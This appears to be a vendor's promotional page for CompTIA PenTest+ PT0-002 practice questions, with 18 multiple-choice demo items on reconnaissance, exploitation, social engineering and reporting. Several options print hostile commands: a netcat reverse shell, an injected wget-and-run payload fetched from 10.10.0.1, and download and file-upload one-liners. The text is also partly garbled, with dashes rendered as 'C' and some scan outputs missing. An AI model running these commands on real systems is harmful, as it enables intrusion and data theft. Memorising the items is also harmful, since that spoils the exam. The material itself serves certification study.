New CompTIA PenTest+ PT0-002 Exam Questions [2022] Right PT0-002 Preparation Materials

Regina2022-01-26T03:32:16+00:00

Candidates who are planning to complete CompTIA PenTest+ certification exam know that PT0-001 exam will be retired in April of 2022, so they are highly recommended to take PT0-002 exam to complete the CompTIA PenTest+ certification. New PT0-002 exam questions of ITExamShop are available with 140 practice exam questions and answers, which must be the right PT0-002 preparation materials in 2022 to ensure that you can pass CompTIA PenTest+ PT0-002 exam successfully. You can smoothly do your preparation of CompTIA PenTest+ certification exam with the new and valid PT0-002 exam questions of ITExamShop.

Verify PT0-002 New Questions By Reading Free PT0-002 Demo Questions

Page 1 of 2

1. A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Nessus

ProxyChains

OWASPZAP

Empire

2. A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good .

Which of the following recommendations should the penetration tester include in the report?

Add a dependency checker into the tool chain.

Perform routine static and dynamic analysis of committed code.

Validate API security settings before deployment.

Perform fuzz testing of compiled binaries.

3. A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot .

Which of the following techniques would BEST support this objective?

Create a one-shot systemd service to establish a reverse shell.

Obtain /etc/shadow and brute force the root password.

Run the nc -e /bin/sh <...> command.

Move laterally to create a user account on LDAP

4. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet .

Which of the following OSs would MOST likely return a packet of this type?

Windows

Apple

Linux

Android

5. Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

devices produce more heat and consume more power.

devices are obsolete and are no longer available for replacement.

protocols are more difficult to understand.

devices may cause physical world effects.

6. A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources .

Which of the following attack types is MOST concerning to the company?

Data flooding

Session riding

Cybersquatting

Side channel

7. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server | rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00 8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

ftp 192.168.53.23

smbclient \\WEB3\IPC$ -I 192.168.53.23 CU guest

ncrack Cu Administrator CP 15worst_passwords.txt Cp rdp 192.168.53.23

curl CX TRACE https://192.168.53.23:8443/index.aspx

nmap C-script vuln CsV 192.168.53.23

8. A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository.

After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

Hydra and crunch

Netcat and cURL

Burp Suite and DIRB

Nmap and OWASP ZAP

9. 1.Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Shodan

Nmap

WebScarab-NG

Nessus

10. Penetration-testing activities have concluded, and the initial findings have been reviewed with the client .

Which of the following best describes the NEXT step in the engagement?

Acceptance by the client and sign-off on the final report

Scheduling of follow-up actions and retesting

Attestation of findings and delivery of the report

Review of the lessons learned during the engagement

Page 2 of 2

11. A penetration tester has been given eight business hours to gain access to a client’s financial system .

Which of the following techniques will have the highest likelihood of success?

Attempting to tailgate an employee going into the client's workplace

Dropping a malicious USB key with the company’s logo in the parking lot

Using a brute-force attack against the external perimeter to gain a foothold

Performing spear phishing against employees by posing as senior management

12. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift .

Which of the following social-engineering attacks was the tester utilizing?

Phishing

Tailgating

Baiting

Shoulder surfing

13. A compliance-based penetration test is primarily concerned with:

obtaining Pll from the protected network.

bypassing protection on edge devices.

determining the efficacy of a specific set of security standards.

obtaining specific information from the protected network.

14. A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code .

Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

Immunity Debugger

OllyDbg

GDB

Drozer

15. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

grep Cv apache ~/.bash_history > ~/.bash_history

rm Crf /tmp/apache

chmod 600 /tmp/apache

taskkill /IM “apache” /F

16. A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations .

Which of the following are considered passive reconnaissance tools? (Choose two.)

Wireshark

Nessus

Retina

Burp Suite

Shodan

Nikto

17. A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions .

Which of the following commands would help the tester START this process?

certutil Curlcache Csplit Cf http://192.168.2.124/windows-binaries/ accesschk64.exe

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

schtasks /query /fo LIST /v | find /I “Next Run Time:”

wget http://192.168.2.124/windows-binaries/accesschk64.exe CO accesschk64.exe

18. DRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.